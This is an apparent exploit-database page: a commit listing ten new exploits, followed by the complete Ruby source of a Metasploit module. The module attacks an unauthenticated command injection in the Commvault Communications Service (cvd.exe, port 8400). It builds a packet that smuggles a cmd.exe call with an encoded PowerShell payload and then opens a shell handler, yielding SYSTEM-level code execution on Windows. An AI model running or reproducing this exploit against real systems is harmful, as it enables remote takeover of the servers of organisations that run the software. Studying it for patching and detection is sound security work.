ffa8e63e25
10 changes to exploits/shellcodes Microsoft Edge Chakra JIT - Op_MaxInAnArray and Op_MinInAnArray can Explicitly call User-Defined JavaScript Functions Microsoft Edge Chakra JIT - BackwardPass::RemoveEmptyLoopAfterMemOp Does not Insert Branches Microsoft Edge Chakra - 'asm.js' Out-of-Bounds Read Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138_ QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure Android - Inter-Process munmap due to Race Condition in ashmem Microsoft Windows - 'nt!NtQueryInformationProcess (information class 76_ QueryProcessEnergyValues)' Kernel Stack Memory Disclosure Microsoft Edge Chakra JIT - Escape Analysis Bug Microsoft Windows - Local XPS Print Spooler Sandbox Escape Commvault Communications Service (cvd) - Command Injection (Metasploit) osCommerce 2.2 - SQL Injection
98 lines
No EOL
2.8 KiB
Ruby
Executable file
98 lines
No EOL
2.8 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core/exploit/powershell'
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = GoodRanking
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Exploit::Powershell
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => 'Commvault Communications Service (cvd) Command Injection',
|
|
'Description' => %q{
|
|
This module exploits a command injection vulnerability
|
|
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
|
|
and v10). The vulnerability exists in the cvd.exe service and allows an
|
|
attacker to execute arbitrary commands in the context of the service. By
|
|
default, the Commvault Communications service installs and runs as SYSTEM in
|
|
Windows and does not require authentication. This vulnerability was discovered
|
|
in the Windows version. The Linux version wasn't tested.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
|
|
],
|
|
'References' =>
|
|
[
|
|
['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
|
|
],
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
|
|
{
|
|
'Arch' => [ARCH_X64, ARCH_X86]
|
|
}
|
|
],
|
|
],
|
|
'Privileged' => true,
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Dec 12 2017'))
|
|
|
|
register_options([Opt::RPORT(8400)])
|
|
|
|
end
|
|
|
|
def exploit
|
|
|
|
buf = build_exploit
|
|
print_status("Connecting to Commvault Communications Service.")
|
|
connect
|
|
print_status("Executing payload")
|
|
#Send the payload
|
|
sock.put(buf)
|
|
#Handle the shell
|
|
handler
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
|
def build_exploit
|
|
|
|
#Get encoded powershell of payload
|
|
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
|
|
#Remove additional cmd.exe call
|
|
psh = "powershell"
|
|
idx = command.index(psh)
|
|
command = command[(idx)..-1]
|
|
|
|
#Build packet
|
|
cmd_path = 'C:\Windows\System32\cmd.exe'
|
|
msg_type = 9
|
|
zero = 0
|
|
payload = ""
|
|
payload += make_nops(8)
|
|
payload += [msg_type].pack('I>')
|
|
payload += make_nops(328)
|
|
payload += cmd_path
|
|
payload += ";"
|
|
payload += ' /c "'
|
|
payload += command
|
|
payload += '" && echo '
|
|
payload += "\x00"
|
|
payload += [zero].pack('I>')
|
|
|
|
#Add length header and payload
|
|
ret_data = [payload.length].pack('I>')
|
|
ret_data += payload
|
|
|
|
ret_data
|
|
|
|
end
|
|
end |